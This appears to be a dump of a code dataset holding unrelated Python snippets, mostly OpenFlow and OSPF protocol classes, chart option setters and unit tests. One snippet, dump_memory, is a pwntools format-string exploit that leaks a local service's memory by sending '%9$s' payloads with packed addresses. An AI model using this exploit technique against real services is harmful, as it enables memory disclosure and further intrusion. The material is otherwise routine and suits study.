code
stringlengths
281
23.7M
_set_msg_type(ofproto.OFPT_QUEUE_GET_CONFIG_REQUEST) class OFPQueueGetConfigRequest(MsgBase): def __init__(self, datapath, port): super(OFPQueueGetConfigRequest, self).__init__(datapath) self.port = port def _serialize_body(self): msg_pack_into(ofproto.OFP_QUEUE_GET_CONFIG_REQUEST_PACK_STR, self.buf, ofproto.OFP_HEADER_SIZE, self.port)
class CommConfigs(Options): def _get_commons(self, name: str=None): return self.component.options['commons'].get((name or sys._getframe().f_back.f_code.co_name)) def _set_commons(self, value: Any, name: str=None): name = (name or sys._getframe().f_back.f_code.co_name) for ds in self.component._datasets: ds._attrs[name] = value self.component.options['commons'][name] = value def update(self, vals: dict): for (k, v) in vals.items(): self._set_commons(v, k) def attr(self, name: str, value: Any=None): if (value is None): return self._get_commons(name) self._set_commons(value, name) def borderWidth(self): return self._get_commons() def borderWidth(self, num: int): self._set_commons(num) def borderRadius(self): return self._get_commons() def borderRadius(self, num: int): self._set_commons(num) def borderSkipped(self): return self._get_commons() def borderSkipped(self, value: Union[(bool, str)]): self._set_commons(value) def clip(self): return self._get_commons() def clip(self, value: Any): self._set_commons(value) def hoverBackgroundColor(self): return self._get_commons() def hoverBackgroundColor(self, value: str): self._set_commons(value) def hoverBorderColor(self): return self._get_commons() def hoverBorderColor(self, value: str): self._set_commons(value) def hoverBorderWidth(self): return self._get_commons() def hoverBorderWidth(self, num: int): self._set_commons(num) def hoverBorderRadius(self): return self._get_commons() def hoverBorderRadius(self, num: int): self._set_commons(num) def hoverOffset(self): return self._get_commons() def hoverOffset(self, num: int): self._set_commons(num) def order(self): return self._get_commons() def order(self, value: str): self._set_commons(value) def offset(self): return self._get_commons() def offset(self, values: Any): self._set_commons(values) def pointStyle(self): return self._get_commons() def pointStyle(self, value: str): self._set_commons(value) def stack(self): return self._get_commons() def stack(self, value: str): self._set_commons(value)
_type(OSPF_MSG_DB_DESC) class OSPFDBDesc(OSPFMessage): _PACK_STR = '!HBBI' _PACK_LEN = struct.calcsize(_PACK_STR) _MIN_LEN = (OSPFMessage._HDR_LEN + _PACK_LEN) def __init__(self, length=None, router_id='0.0.0.0', area_id='0.0.0.0', au_type=1, authentication=0, checksum=None, version=_VERSION, mtu=1500, options=0, i_flag=0, m_flag=0, ms_flag=0, sequence_number=0, lsa_headers=None): lsa_headers = (lsa_headers if lsa_headers else []) super(OSPFDBDesc, self).__init__(OSPF_MSG_DB_DESC, length, router_id, area_id, au_type, authentication, checksum, version) self.mtu = mtu self.options = options self.i_flag = i_flag self.m_flag = m_flag self.ms_flag = ms_flag self.sequence_number = sequence_number self.lsa_headers = lsa_headers def parser(cls, buf): (mtu, options, flags, sequence_number) = struct.unpack_from(cls._PACK_STR, six.binary_type(buf)) i_flag = ((flags >> 2) & 1) m_flag = ((flags >> 1) & 1) ms_flag = (flags & 1) lsahdrs = [] buf = buf[cls._PACK_LEN:] while buf: (kwargs, buf) = LSAHeader.parser(buf) lsahdrs.append(LSAHeader(**kwargs)) return {'mtu': mtu, 'options': options, 'i_flag': i_flag, 'm_flag': m_flag, 'ms_flag': ms_flag, 'sequence_number': sequence_number, 'lsa_headers': lsahdrs} def serialize_tail(self): flags = ((((self.i_flag & 1) << 2) ^ ((self.m_flag & 1) << 1)) ^ (self.ms_flag & 1)) head = bytearray(struct.pack(self._PACK_STR, self.mtu, self.options, flags, self.sequence_number)) try: return (head + reduce((lambda a, b: (a + b)), (hdr.serialize() for hdr in self.lsa_headers))) except TypeError: return head
def dump_memory(): def dump(start_addr, end_addr): result = '' while (start_addr < end_addr): io = remote('127.0.0.1', '10001') io.recvline() payload = ('%9$s.AAA' + p32(start_addr)) io.sendline(payload) data = io.recvuntil('.AAA')[:(- 4)] if (data == ''): data = '\x00' log.info(('leaking: 0x%x --> %s' % (start_addr, data.encode('hex')))) result += data start_addr += len(data) io.close() return result code_bin = dump(, ) with open('code.bin', 'wb') as f: f.write(code_bin) f.close()
class OptionSeriesPolygonSonificationDefaultinstrumentoptionsMappingVolume(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
class OptionSeriesHistogramSonificationContexttracksMappingTremoloSpeed(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
class TestVerifyRunAgainstBcl2fastq2SampleSheetNoLaneSplitting(unittest.TestCase): def setUp(self): self.top_dir = tempfile.mkdtemp() self.mock_illumina_data = MockIlluminaData('test.MockIlluminaData', 'bcl2fastq2', paired_end=True, no_lane_splitting=True, top_dir=self.top_dir) self.mock_illumina_data.add_fastq_batch('AB', 'AB1', 'AB1_S1') self.mock_illumina_data.add_fastq_batch('AB', 'AB2', 'AB2_S2') self.mock_illumina_data.add_fastq_batch('CDE', 'CDE3', 'CDE3_S3') self.mock_illumina_data.add_fastq_batch('CDE', 'CDE4', 'CDE4_S4') self.mock_illumina_data.add_undetermined() self.mock_illumina_data.create() (fno, self.sample_sheet) = tempfile.mkstemp() fp = os.fdopen(fno, 'w') fp.write('[Header]\n\n[Reads]\n\n[Settings]\n\n[Data]\nSample_ID,Sample_Name,Sample_Plate,Sample_Well,I7_Index_ID,index,Sample_Project,Description\nAB1,AB1,,,N0,GCCAAT,AB,\nAB2,AB2,,,N1,AGTCAA,AB,\nCDE3,CDE3,,,N2,GCCAAT,CDE,\nCDE4,CDE4,,,N3,AGTCAA,CDE,') fp.close() def tearDown(self): if (self.mock_illumina_data is not None): self.mock_illumina_data.remove() os.rmdir(self.top_dir) os.remove(self.sample_sheet) def test_verify_run_against_sample_sheet(self): illumina_data = IlluminaData(self.mock_illumina_data.dirn) self.assertEqual(list_missing_fastqs(illumina_data, self.sample_sheet), []) self.assertTrue(verify_run_against_sample_sheet(illumina_data, self.sample_sheet)) def test_verify_run_against_sample_sheet_with_missing_project(self): shutil.rmtree(os.path.join(self.mock_illumina_data.dirn, self.mock_illumina_data.unaligned_dir, 'AB')) illumina_data = IlluminaData(self.mock_illumina_data.dirn) self.assertEqual(list_missing_fastqs(illumina_data, self.sample_sheet), ['AB/AB1_S1_R1_001.fastq.gz', 'AB/AB1_S1_R2_001.fastq.gz', 'AB/AB2_S2_R1_001.fastq.gz', 'AB/AB2_S2_R2_001.fastq.gz']) self.assertFalse(verify_run_against_sample_sheet(illumina_data, self.sample_sheet)) def test_verify_run_against_sample_sheet_with_missing_sample(self): for f in os.listdir(os.path.join(self.mock_illumina_data.dirn, self.mock_illumina_data.unaligned_dir, 'AB')): print(f) if f.startswith('AB1'): fq = os.path.join(self.mock_illumina_data.dirn, self.mock_illumina_data.unaligned_dir, 'AB', f) print(('Removing %s' % fq)) os.remove(fq) illumina_data = IlluminaData(self.mock_illumina_data.dirn) self.assertEqual(list_missing_fastqs(illumina_data, self.sample_sheet), ['AB/AB1_S1_R1_001.fastq.gz', 'AB/AB1_S1_R2_001.fastq.gz']) self.assertFalse(verify_run_against_sample_sheet(illumina_data, self.sample_sheet)) def test_verify_run_against_sample_sheet_with_missing_fastq(self): os.remove(os.path.join(self.mock_illumina_data.dirn, self.mock_illumina_data.unaligned_dir, 'CDE', 'CDE4_S4_R2_001.fastq.gz')) illumina_data = IlluminaData(self.mock_illumina_data.dirn) self.assertFalse(verify_run_against_sample_sheet(illumina_data, self.sample_sheet))
class GenericTestCase(testslide.TestCase): def testAnyFalsey(self): self.assertEqual(testslide.matchers.AnyFalsey(), {}) self.assertEqual(testslide.matchers.AnyFalsey(), []) self.assertEqual(testslide.matchers.AnyFalsey(), ()) self.assertEqual(testslide.matchers.AnyFalsey(), '') self.assertEqual(testslide.matchers.AnyFalsey(), None) self.assertEqual(testslide.matchers.AnyFalsey(), 0) self.assertNotEqual(testslide.matchers.AnyFalsey(), {'a': 'b'}) self.assertNotEqual(testslide.matchers.AnyFalsey(), ['a', 'b']) self.assertNotEqual(testslide.matchers.AnyFalsey(), ('a', 'b')) self.assertNotEqual(testslide.matchers.AnyFalsey(), 'a') self.assertNotEqual(testslide.matchers.AnyFalsey(), 1) def testAnyTruthy(self): self.assertNotEqual(testslide.matchers.AnyTruthy(), {}) self.assertNotEqual(testslide.matchers.AnyTruthy(), []) self.assertNotEqual(testslide.matchers.AnyTruthy(), ()) self.assertNotEqual(testslide.matchers.AnyTruthy(), '') self.assertNotEqual(testslide.matchers.AnyTruthy(), None) self.assertNotEqual(testslide.matchers.AnyTruthy(), 0) self.assertEqual(testslide.matchers.AnyTruthy(), {'a': 'b'}) self.assertEqual(testslide.matchers.AnyTruthy(), ['a', 'b']) self.assertEqual(testslide.matchers.AnyTruthy(), ('a', 'b')) self.assertEqual(testslide.matchers.AnyTruthy(), 'a') self.assertEqual(testslide.matchers.AnyTruthy(), 1) def testAny(self): self.assertEqual(testslide.matchers.Any(), {}) self.assertEqual(testslide.matchers.Any(), []) self.assertEqual(testslide.matchers.Any(), ()) self.assertEqual(testslide.matchers.Any(), '') self.assertEqual(testslide.matchers.Any(), None) self.assertEqual(testslide.matchers.Any(), 0) self.assertEqual(testslide.matchers.Any(), {'a': 'b'}) self.assertEqual(testslide.matchers.Any(), ['a', 'b']) self.assertEqual(testslide.matchers.Any(), ('a', 'b')) self.assertEqual(testslide.matchers.Any(), 'a') self.assertEqual(testslide.matchers.Any(), 1) def testAnyInstanceOf(self): self.assertEqual(testslide.matchers.AnyInstanceOf(str), 'durrdurr') self.assertNotEqual(testslide.matchers.AnyInstanceOf(str), 7) with self.assertRaises(ValueError): testslide.matchers.AnyInstanceOf(2) def testAnyWithCall(self): self.assertEqual(testslide.matchers.AnyWithCall((lambda x: ('b' in x))), 'abc') self.assertNotEqual(testslide.matchers.AnyWithCall((lambda x: ('d' in x))), 'abc')
class Create2EIP2929(Create2): def generate_contract_address(self, stack_data: CreateOpcodeStackData, call_data: bytes, computation: ComputationAPI) -> Address: address = super().generate_contract_address(stack_data, call_data, computation) computation.state.mark_address_warm(address) return address
class OFPMatch(StringifyMixin): def __init__(self, type_=None, length=None, _ordered_fields=None, **kwargs): super(OFPMatch, self).__init__() self._wc = FlowWildcards() self._flow = Flow() self.fields = [] self.type = ofproto.OFPMT_OXM self.length = length if (_ordered_fields is not None): assert (not kwargs) self._fields2 = _ordered_fields else: kwargs = dict((ofproto.oxm_normalize_user(k, v) for (k, v) in kwargs.items())) fields = [ofproto.oxm_from_user(k, v) for (k, v) in kwargs.items()] fields.sort(key=(lambda x: (x[0][0] if isinstance(x[0], tuple) else x[0]))) self._fields2 = [ofproto.oxm_to_user(n, v, m) for (n, v, m) in fields] def __getitem__(self, key): return dict(self._fields2)[key] def __contains__(self, key): return (key in dict(self._fields2)) def iteritems(self): return iter(dict(self._fields2).items()) def items(self): return self._fields2 def get(self, key, default=None): return dict(self._fields2).get(key, default) def stringify_attrs(self): (yield ('oxm_fields', dict(self._fields2))) def to_jsondict(self): if self._composed_with_old_api(): o2 = OFPMatch() o2.fields = self.fields[:] buf = bytearray() o2.serialize(buf, 0) o = OFPMatch.parser(six.binary_type(buf), 0) else: o = self body = {'oxm_fields': [ofproto.oxm_to_jsondict(k, uv) for (k, uv) in o._fields2], 'length': o.length, 'type': o.type} return {self.__class__.__name__: body} def from_jsondict(cls, dict_): fields = [ofproto.oxm_from_jsondict(f) for f in dict_['oxm_fields']] o = OFPMatch(_ordered_fields=fields) buf = bytearray() o.serialize(buf, 0) return OFPMatch.parser(six.binary_type(buf), 0) def __str__(self): if self._composed_with_old_api(): o2 = OFPMatch() o2.fields = self.fields[:] buf = bytearray() o2.serialize(buf, 0) o = OFPMatch.parser(six.binary_type(buf), 0) else: o = self return super(OFPMatch, o).__str__() __repr__ = __str__ def append_field(self, header, value, mask=None): self.fields.append(OFPMatchField.make(header, value, mask)) def _composed_with_old_api(self): return ((self.fields and (not self._fields2)) or (self._wc.__dict__ != FlowWildcards().__dict__)) def serialize(self, buf, offset): if self._composed_with_old_api(): return self.serialize_old(buf, offset) fields = [ofproto.oxm_from_user(k, uv) for (k, uv) in self._fields2] hdr_pack_str = '!HH' field_offset = (offset + struct.calcsize(hdr_pack_str)) for (n, value, mask) in fields: field_offset += ofproto.oxm_serialize(n, value, mask, buf, field_offset) length = (field_offset - offset) msg_pack_into(hdr_pack_str, buf, offset, ofproto.OFPMT_OXM, length) self.length = length pad_len = (utils.round_up(length, 8) - length) msg_pack_into(('%dx' % pad_len), buf, field_offset) return (length + pad_len) def serialize_old(self, buf, offset): if hasattr(self, '_serialized'): raise Exception('serializing an OFPMatch composed with old API multiple times is not supported') self._serialized = True if self._wc.ft_test(ofproto.OFPXMT_OFB_IN_PORT): self.append_field(ofproto.OXM_OF_IN_PORT, self._flow.in_port) if self._wc.ft_test(ofproto.OFPXMT_OFB_IN_PHY_PORT): self.append_field(ofproto.OXM_OF_IN_PHY_PORT, self._flow.in_phy_port) if self._wc.ft_test(ofproto.OFPXMT_OFB_METADATA): if (self._wc.metadata_mask == UINT64_MAX): header = ofproto.OXM_OF_METADATA else: header = ofproto.OXM_OF_METADATA_W self.append_field(header, self._flow.metadata, self._wc.metadata_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_ETH_DST): if self._wc.dl_dst_mask: header = ofproto.OXM_OF_ETH_DST_W else: header = ofproto.OXM_OF_ETH_DST self.append_field(header, self._flow.dl_dst, self._wc.dl_dst_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_ETH_SRC): if self._wc.dl_src_mask: header = ofproto.OXM_OF_ETH_SRC_W else: header = ofproto.OXM_OF_ETH_SRC self.append_field(header, self._flow.dl_src, self._wc.dl_src_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_ETH_TYPE): self.append_field(ofproto.OXM_OF_ETH_TYPE, self._flow.dl_type) if self._wc.ft_test(ofproto.OFPXMT_OFB_VLAN_VID): if (self._wc.vlan_vid_mask == UINT16_MAX): header = ofproto.OXM_OF_VLAN_VID else: header = ofproto.OXM_OF_VLAN_VID_W self.append_field(header, self._flow.vlan_vid, self._wc.vlan_vid_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_VLAN_PCP): self.append_field(ofproto.OXM_OF_VLAN_PCP, self._flow.vlan_pcp) if self._wc.ft_test(ofproto.OFPXMT_OFB_IP_DSCP): self.append_field(ofproto.OXM_OF_IP_DSCP, self._flow.ip_dscp) if self._wc.ft_test(ofproto.OFPXMT_OFB_IP_ECN): self.append_field(ofproto.OXM_OF_IP_ECN, self._flow.ip_ecn) if self._wc.ft_test(ofproto.OFPXMT_OFB_IP_PROTO): self.append_field(ofproto.OXM_OF_IP_PROTO, self._flow.ip_proto) if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV4_SRC): if (self._wc.ipv4_src_mask == UINT32_MAX): header = ofproto.OXM_OF_IPV4_SRC else: header = ofproto.OXM_OF_IPV4_SRC_W self.append_field(header, self._flow.ipv4_src, self._wc.ipv4_src_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV4_DST): if (self._wc.ipv4_dst_mask == UINT32_MAX): header = ofproto.OXM_OF_IPV4_DST else: header = ofproto.OXM_OF_IPV4_DST_W self.append_field(header, self._flow.ipv4_dst, self._wc.ipv4_dst_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_TCP_SRC): self.append_field(ofproto.OXM_OF_TCP_SRC, self._flow.tcp_src) if self._wc.ft_test(ofproto.OFPXMT_OFB_TCP_DST): self.append_field(ofproto.OXM_OF_TCP_DST, self._flow.tcp_dst) if self._wc.ft_test(ofproto.OFPXMT_OFB_UDP_SRC): self.append_field(ofproto.OXM_OF_UDP_SRC, self._flow.udp_src) if self._wc.ft_test(ofproto.OFPXMT_OFB_UDP_DST): self.append_field(ofproto.OXM_OF_UDP_DST, self._flow.udp_dst) if self._wc.ft_test(ofproto.OFPXMT_OFB_SCTP_SRC): self.append_field(ofproto.OXM_OF_SCTP_SRC, self._flow.sctp_src) if self._wc.ft_test(ofproto.OFPXMT_OFB_SCTP_DST): self.append_field(ofproto.OXM_OF_SCTP_DST, self._flow.sctp_dst) if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV4_TYPE): self.append_field(ofproto.OXM_OF_ICMPV4_TYPE, self._flow.icmpv4_type) if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV4_CODE): self.append_field(ofproto.OXM_OF_ICMPV4_CODE, self._flow.icmpv4_code) if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_OP): self.append_field(ofproto.OXM_OF_ARP_OP, self._flow.arp_op) if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_SPA): if (self._wc.arp_spa_mask == UINT32_MAX): header = ofproto.OXM_OF_ARP_SPA else: header = ofproto.OXM_OF_ARP_SPA_W self.append_field(header, self._flow.arp_spa, self._wc.arp_spa_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_TPA): if (self._wc.arp_tpa_mask == UINT32_MAX): header = ofproto.OXM_OF_ARP_TPA else: header = ofproto.OXM_OF_ARP_TPA_W self.append_field(header, self._flow.arp_tpa, self._wc.arp_tpa_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_SHA): if self._wc.arp_sha_mask: header = ofproto.OXM_OF_ARP_SHA_W else: header = ofproto.OXM_OF_ARP_SHA self.append_field(header, self._flow.arp_sha, self._wc.arp_sha_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_THA): if self._wc.arp_tha_mask: header = ofproto.OXM_OF_ARP_THA_W else: header = ofproto.OXM_OF_ARP_THA self.append_field(header, self._flow.arp_tha, self._wc.arp_tha_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_SRC): if len(self._wc.ipv6_src_mask): header = ofproto.OXM_OF_IPV6_SRC_W else: header = ofproto.OXM_OF_IPV6_SRC self.append_field(header, self._flow.ipv6_src, self._wc.ipv6_src_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_DST): if len(self._wc.ipv6_dst_mask): header = ofproto.OXM_OF_IPV6_DST_W else: header = ofproto.OXM_OF_IPV6_DST self.append_field(header, self._flow.ipv6_dst, self._wc.ipv6_dst_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_FLABEL): if (self._wc.ipv6_flabel_mask == UINT32_MAX): header = ofproto.OXM_OF_IPV6_FLABEL else: header = ofproto.OXM_OF_IPV6_FLABEL_W self.append_field(header, self._flow.ipv6_flabel, self._wc.ipv6_flabel_mask) if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV6_TYPE): self.append_field(ofproto.OXM_OF_ICMPV6_TYPE, self._flow.icmpv6_type) if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV6_CODE): self.append_field(ofproto.OXM_OF_ICMPV6_CODE, self._flow.icmpv6_code) if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_ND_TARGET): self.append_field(ofproto.OXM_OF_IPV6_ND_TARGET, self._flow.ipv6_nd_target) if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_ND_SLL): self.append_field(ofproto.OXM_OF_IPV6_ND_SLL, self._flow.ipv6_nd_sll) if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_ND_TLL): self.append_field(ofproto.OXM_OF_IPV6_ND_TLL, self._flow.ipv6_nd_tll) if self._wc.ft_test(ofproto.OFPXMT_OFB_MPLS_LABEL): self.append_field(ofproto.OXM_OF_MPLS_LABEL, self._flow.mpls_label) if self._wc.ft_test(ofproto.OFPXMT_OFB_MPLS_TC): self.append_field(ofproto.OXM_OF_MPLS_TC, self._flow.mpls_tc) field_offset = (offset + 4) for f in self.fields: f.serialize(buf, field_offset) field_offset += f.length length = (field_offset - offset) msg_pack_into('!HH', buf, offset, ofproto.OFPMT_OXM, length) pad_len = (utils.round_up(length, 8) - length) msg_pack_into(('%dx' % pad_len), buf, field_offset) return (length + pad_len) def parser(cls, buf, offset): match = OFPMatch() (type_, length) = struct.unpack_from('!HH', buf, offset) match.type = type_ match.length = length offset += 4 length -= 4 cls.parser_old(match, buf, offset, length) fields = [] while (length > 0): (n, value, mask, field_len) = ofproto.oxm_parse(buf, offset) (k, uv) = ofproto.oxm_to_user(n, value, mask) fields.append((k, uv)) offset += field_len length -= field_len match._fields2 = fields return match def parser_old(match, buf, offset, length): while (length > 0): field = OFPMatchField.parser(buf, offset) offset += field.length length -= field.length match.fields.append(field) def set_in_port(self, port): self._wc.ft_set(ofproto.OFPXMT_OFB_IN_PORT) self._flow.in_port = port def set_in_phy_port(self, phy_port): self._wc.ft_set(ofproto.OFPXMT_OFB_IN_PHY_PORT) self._flow.in_phy_port = phy_port def set_metadata(self, metadata): self.set_metadata_masked(metadata, UINT64_MAX) def set_metadata_masked(self, metadata, mask): self._wc.ft_set(ofproto.OFPXMT_OFB_METADATA) self._wc.metadata_mask = mask self._flow.metadata = (metadata & mask) def set_dl_dst(self, dl_dst): self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_DST) self._flow.dl_dst = dl_dst def set_dl_dst_masked(self, dl_dst, mask): self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_DST) self._wc.dl_dst_mask = mask self._flow.dl_dst = mac.haddr_bitand(dl_dst, mask) def set_dl_src(self, dl_src): self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_SRC) self._flow.dl_src = dl_src def set_dl_src_masked(self, dl_src, mask): self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_SRC) self._wc.dl_src_mask = mask self._flow.dl_src = mac.haddr_bitand(dl_src, mask) def set_dl_type(self, dl_type): self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_TYPE) self._flow.dl_type = dl_type def set_vlan_vid_none(self): self._wc.ft_set(ofproto.OFPXMT_OFB_VLAN_VID) self._wc.vlan_vid_mask = UINT16_MAX self._flow.vlan_vid = ofproto.OFPVID_NONE def set_vlan_vid(self, vid): self.set_vlan_vid_masked(vid, UINT16_MAX) def set_vlan_vid_masked(self, vid, mask): vid |= ofproto.OFPVID_PRESENT self._wc.ft_set(ofproto.OFPXMT_OFB_VLAN_VID) self._wc.vlan_vid_mask = mask self._flow.vlan_vid = vid def set_vlan_pcp(self, pcp): self._wc.ft_set(ofproto.OFPXMT_OFB_VLAN_PCP) self._flow.vlan_pcp = pcp def set_ip_dscp(self, ip_dscp): self._wc.ft_set(ofproto.OFPXMT_OFB_IP_DSCP) self._flow.ip_dscp = ip_dscp def set_ip_ecn(self, ip_ecn): self._wc.ft_set(ofproto.OFPXMT_OFB_IP_ECN) self._flow.ip_ecn = ip_ecn def set_ip_proto(self, ip_proto): self._wc.ft_set(ofproto.OFPXMT_OFB_IP_PROTO) self._flow.ip_proto = ip_proto def set_ipv4_src(self, ipv4_src): self.set_ipv4_src_masked(ipv4_src, UINT32_MAX) def set_ipv4_src_masked(self, ipv4_src, mask): self._wc.ft_set(ofproto.OFPXMT_OFB_IPV4_SRC) self._flow.ipv4_src = ipv4_src self._wc.ipv4_src_mask = mask def set_ipv4_dst(self, ipv4_dst): self.set_ipv4_dst_masked(ipv4_dst, UINT32_MAX) def set_ipv4_dst_masked(self, ipv4_dst, mask): self._wc.ft_set(ofproto.OFPXMT_OFB_IPV4_DST) self._flow.ipv4_dst = ipv4_dst self._wc.ipv4_dst_mask = mask def set_tcp_src(self, tcp_src): self._wc.ft_set(ofproto.OFPXMT_OFB_TCP_SRC) self._flow.tcp_src = tcp_src def set_tcp_dst(self, tcp_dst): self._wc.ft_set(ofproto.OFPXMT_OFB_TCP_DST) self._flow.tcp_dst = tcp_dst def set_udp_src(self, udp_src): self._wc.ft_set(ofproto.OFPXMT_OFB_UDP_SRC) self._flow.udp_src = udp_src def set_udp_dst(self, udp_dst): self._wc.ft_set(ofproto.OFPXMT_OFB_UDP_DST) self._flow.udp_dst = udp_dst def set_sctp_src(self, sctp_src): self._wc.ft_set(ofproto.OFPXMT_OFB_SCTP_SRC) self._flow.sctp_src = sctp_src def set_sctp_dst(self, sctp_dst): self._wc.ft_set(ofproto.OFPXMT_OFB_SCTP_DST) self._flow.sctp_dst = sctp_dst def set_icmpv4_type(self, icmpv4_type): self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV4_TYPE) self._flow.icmpv4_type = icmpv4_type def set_icmpv4_code(self, icmpv4_code): self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV4_CODE) self._flow.icmpv4_code = icmpv4_code def set_arp_opcode(self, arp_op): self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_OP) self._flow.arp_op = arp_op def set_arp_spa(self, arp_spa): self.set_arp_spa_masked(arp_spa, UINT32_MAX) def set_arp_spa_masked(self, arp_spa, mask): self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_SPA) self._wc.arp_spa_mask = mask self._flow.arp_spa = arp_spa def set_arp_tpa(self, arp_tpa): self.set_arp_tpa_masked(arp_tpa, UINT32_MAX) def set_arp_tpa_masked(self, arp_tpa, mask): self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_TPA) self._wc.arp_tpa_mask = mask self._flow.arp_tpa = arp_tpa def set_arp_sha(self, arp_sha): self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_SHA) self._flow.arp_sha = arp_sha def set_arp_sha_masked(self, arp_sha, mask): self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_SHA) self._wc.arp_sha_mask = mask self._flow.arp_sha = mac.haddr_bitand(arp_sha, mask) def set_arp_tha(self, arp_tha): self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_THA) self._flow.arp_tha = arp_tha def set_arp_tha_masked(self, arp_tha, mask): self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_THA) self._wc.arp_tha_mask = mask self._flow.arp_tha = mac.haddr_bitand(arp_tha, mask) def set_ipv6_src(self, src): self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_SRC) self._flow.ipv6_src = src def set_ipv6_src_masked(self, src, mask): self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_SRC) self._wc.ipv6_src_mask = mask self._flow.ipv6_src = [(x & y) for (x, y) in zip(src, mask)] def set_ipv6_dst(self, dst): self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_DST) self._flow.ipv6_dst = dst def set_ipv6_dst_masked(self, dst, mask): self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_DST) self._wc.ipv6_dst_mask = mask self._flow.ipv6_dst = [(x & y) for (x, y) in zip(dst, mask)] def set_ipv6_flabel(self, flabel): self.set_ipv6_flabel_masked(flabel, UINT32_MAX) def set_ipv6_flabel_masked(self, flabel, mask): self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_FLABEL) self._wc.ipv6_flabel_mask = mask self._flow.ipv6_flabel = flabel def set_icmpv6_type(self, icmpv6_type): self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV6_TYPE) self._flow.icmpv6_type = icmpv6_type def set_icmpv6_code(self, icmpv6_code): self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV6_CODE) self._flow.icmpv6_code = icmpv6_code def set_ipv6_nd_target(self, target): self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_ND_TARGET) self._flow.ipv6_nd_target = target def set_ipv6_nd_sll(self, ipv6_nd_sll): self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_ND_SLL) self._flow.ipv6_nd_sll = ipv6_nd_sll def set_ipv6_nd_tll(self, ipv6_nd_tll): self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_ND_TLL) self._flow.ipv6_nd_tll = ipv6_nd_tll def set_mpls_label(self, mpls_label): self._wc.ft_set(ofproto.OFPXMT_OFB_MPLS_LABEL) self._flow.mpls_label = mpls_label def set_mpls_tc(self, mpls_tc): self._wc.ft_set(ofproto.OFPXMT_OFB_MPLS_TC) self._flow.mpls_tc = mpls_tc
class SudokuCSP(CSP): def to_str(self, assignment): s = '' for row in range(9): if ((row % 3) == 0): s += '+-------+-------+-------+\n' s += '| ' for col in range(9): if ((row, col) in assignment): s += str(assignment[(row, col)]) else: s += '_' if ((col % 3) == 2): s += ' | ' else: s += ' ' s += '\n' s += '+-------+-------+-------+\n' return s
def query(args): if args.file: stream = stream_file_events(args.file, args.format, args.encoding) else: stream = stream_stdin_events(args.format) config = {'print': True} if args.config: config.update(load_dump(args.config)) engine = PythonEngine(config) with engine.schema: try: eql_query = parse_query(args.query, implied_any=True, implied_base=True) engine.add_query(eql_query) except EqlError as e: print(e, file=sys.stderr) sys.exit(2) engine.stream_events(stream, finalize=False) engine.finalize()
class bundle_add_msg(message): version = 5 type = 34 def __init__(self, xid=None, bundle_id=None, flags=None, data=None): if (xid != None): self.xid = xid else: self.xid = None if (bundle_id != None): self.bundle_id = bundle_id else: self.bundle_id = 0 if (flags != None): self.flags = flags else: self.flags = 0 if (data != None): self.data = data else: self.data = '' return def pack(self): packed = [] packed.append(struct.pack('!B', self.version)) packed.append(struct.pack('!B', self.type)) packed.append(struct.pack('!H', 0)) packed.append(struct.pack('!L', self.xid)) packed.append(struct.pack('!L', self.bundle_id)) packed.append(('\x00' * 2)) packed.append(struct.pack('!H', self.flags)) packed.append(self.data) length = sum([len(x) for x in packed]) packed[2] = struct.pack('!H', length) return ''.join(packed) def unpack(reader): obj = bundle_add_msg() _version = reader.read('!B')[0] assert 